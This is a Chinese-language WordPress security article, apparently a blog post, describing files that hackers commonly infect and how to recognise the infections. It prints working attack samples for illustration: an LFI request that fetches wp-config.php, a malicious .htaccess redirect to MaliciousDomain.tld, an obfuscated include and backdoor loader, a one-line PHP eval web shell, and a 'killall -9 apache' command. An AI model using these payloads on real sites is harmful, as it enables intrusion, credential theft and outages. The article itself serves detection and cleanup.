WordPress文件通常被黑客入侵。如何扫描和修复被感染的WordPress文件?

WordPress使创建网站变得非常简单,并鼓励人们从各种背景进行在线展示。

创建自己的网站时,请务必保护WordPress保护。一天早上,您要做的最后一件事是醒来,看到您的网站被黑,您的所有增长和SEO努力都花光了。

由于其成功以及主题和插件,黑客倾向于使用WordPress。如果他们发现一个插件存在缺陷,则几乎所有启用了该插件的网站都可能会被轻易滥用。

例如,以Elementor和Ultimate Addons中的最新漏洞为例。据估计,自从该漏洞被发现以来,超过100万个使用Elementor Pro的网站以及110,000个带有Ultimate Addons的页面被暴露。插件中的故障使授权用户可以将任意文件上传到远程代码执行(RCE)网站。黑客可以借此获得并保留对WordPress的完整功能访问。

同样,在“ Slider Revolution”插件中,存在一个LFI漏洞,使黑客有可能从不安全的WordPress页面下载wp-config.php。这导致数据库详细信息,加密密钥以及有关网站设置的其他机密信息泄漏。这以前称为wp-config.php hack。

在本文档中,我们将讨论WordPress帐户上的黑客和恶意软件可能已击中的所有基本文件和位置。

1)WordPress黑客wp-config.php

对于WP安装,wp-config.php是必不可少的文件。Web使用的配置文件充当数据库和WP文件系统之间的接口。文件wp-config.php包含敏感材料,例如:

  • 主机数据库
  • 密码,用户名和端口号
  • 数据库名称
  • WordPress保护的关键
  • 数据库表前缀

由于其至关重要的特性,它是黑客之间共同的目标。2016年11月,在Revolution Picture Slider插件中发现了一个关键错误。如果黑客从wp-config.php漏洞中获取数据库登录信息,他们将尝试链接到数据库并为自己建立伪造的WP管理员帐户。

http://victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

这是一个LFI(本地文件包含)入侵,使黑客能够下载wp-config文件。这提供了一个网站,存档可直接访问它们。黑客会暴露于机密数据,例如用户凭据,电子邮件ID,目录,照片,来自WooCommerce的交易信息等。他们还可以安装脚本,例如Filesman后门,以提供对WordPress帐户的持续访问。

2)WordPress的Index.php被黑客入侵

index.php文件是WordPress上每个网站的入口点。由于此代码运行在您网站的每个页面上,因此黑客会插入影响您整个网站的恶意代码。

例如,pub2srv恶意软件和Favicon恶意软件黑客的目标index.php文件。Astra Security的研究人员追踪了这种广泛分布的恶意软件重定向活动,发现将@include“ \ x2f / sgb \ x2ffavi \ x63on_5 \ x34e6ed \ x2eico”之类的恶意代码应用于index.php文件;以及以下屏幕截图中的代码:

xpub2srv.png.pagespeed.ic.D-RGVp4-5g

发现恶意代码已插入WordPress安装的index.php文件中

后来由于一些勒索软件活动将index.php文件更改为index.php.bak,迫使网站崩溃而根本无法加载。

在index.php文件中,此类恶意代码可能导致网站访问者看到奇怪的弹出窗口,商业广告,甚至被路由到其他垃圾邮件页面。将此文件的内容与WordPress发布的初始副本进行比较,以修复此类黑客。

3)WordPress .htaccess文件被黑客入侵

通常在WordPress网站的主页位置中找到的.htaccess文件可帮助根据网站要求配置服务器设置。这通常在Apache上运行的服务器中找到。.htaccess文件是用于控制Web服务器的性能和行为的非常强大的组件。它也可以用来控制您网站的安全性。以下是.htaccess文件的一些常见用法:

  • 限制对某些站点文件夹的访问
  • 配置站点的最大内存使用率
  • 构建重定向
  • HTTPS控制
  • 缓存管理
  • 通过脚本注入防止一些攻击
  • 最大文件上传大小控制
  • 阻止机器人能够找到用户名
  • 热链接块图像
  • 控制自动文件下载
  • 管理文件扩展名

但是,这些特征可用于在受到攻击时为攻击者提取点击。为了重定向用户,.htaccess文件通常带有恶意代码。它通常用于查看对消费者的垃圾邮件。例如,查看下面提供的代码:

RewriteEngine On
 RewriteOptions inherit
 RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
 RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

在最后一行,恶意代码正在从站点重定向用户流量。结果,tohttp:/MaliciousDomain.tld被重定向到用户。然后,thebad.php脚本尝试加载。由于.htaccess文件被黑客入侵,如果您发现来自站点的异常重定向,则有可能。但是,如果找不到该文件或该文件为空,请不要惊慌,因为该文件不是必需的(除非您使用漂亮的WordPress URL)。

4)WordPress footer.php和header.php(WordPress主题黑客入侵的文件)

每个WordPress主题都有一个名为footer.php和header.php的文件,其中包含该网站的页脚和标头代码。该区域中包含脚本和某些在整个网站上保持不变的小部件。例如,网站底部的共享窗口小部件或社交媒体窗口小部件。有时也可能只是版权信息,信用证等。

因此,这两个文件是攻击者可以破解的关键文件。它通常用于重定向恶意软件并显示垃圾邮件内容,就像“重定向恶意软件” digestcolect [.com]一样。

其中一些被解码,黑客被发现利用浏览器cookie来识别用户并向他们显示恶意广告等。

此外,在另一个实例中,攻击者将JavaScript代码注入了扩展名为.js的所有文件中。由于受到大规模感染,此类黑客通常变得难以清除。

5)WordPress.php的功能被黑客入侵

在主题文件夹中,功能文件的作用类似于插件。这意味着它可以用于向WordPress网站添加其他功能。可以使用filefunctions.php用于:

  • WordPress的呼叫事件/功能
  • 调用PHP的本机函数。
  • 或描述自己的功能。

对于任何主题,均存在functions.php文件,但请务必记住,在每个给定时刻仅运行一个functions.php文件,即活动主题中的一个。因此,在Wp-VCD后门攻击中,functions.php文件被攻击者蓄意攻击。该恶意软件(例如Pharma和日语SEO垃圾邮件)创建了新管理员,并在网站上注入了垃圾邮件页面。

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

从上面的代码中可以明显看出,该软件包含class.theme-modules.php软件。然后,使用该文件(即使已禁用)也可以将恶意软件注入您网站上构建的其他主题。这样就创建了新用户和后门。即使清除了文件,这也使攻击者可以访问该站点。

6)黑客WordPress wp-load.php WordPress

WordPress平台的重要文件是wp-load.php。文件wp-load.php可以引导WordPress环境,并允许插件有权访问本机WP的关键功能。如China Chopper Web Shell勒索软件所示,许多恶意软件变体通过生成恶意的wp-load档案感染WordPress页面。通常的操作是在服务器上开发wp-load-eFtAh.php之类的文件。由于名称与原始文件的名称匹配,因此登录FTP时不会发现它很奇怪。这些文件可能具有以下代码:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

此代码可帮助入侵者在黑客提交的Web上的pass参数中运行每个PHP代码。使用此漏洞可能会实施有害的指令。http:/ yoursite / your.php?命令,例如,pass = system(“ killall -9 apache”);“可能会杀死Web服务器的进程。这将导致整个服务器关闭。不要按其长度来判断该代码,因为它不够安全,无法远程监视您的服务器。

7)大量的class-wp-cache.php服务器文件

我们已经看到cPanel和整个Web服务器在最近的一次黑客攻击中获得了数百万甚至数千个class-wp-cache.php文件。这些恶意文件破坏了网站的每个文件夹,包括主文件。网站代码中的漏洞为黑客打开了大门,通常是这种感染的来源。

相关文章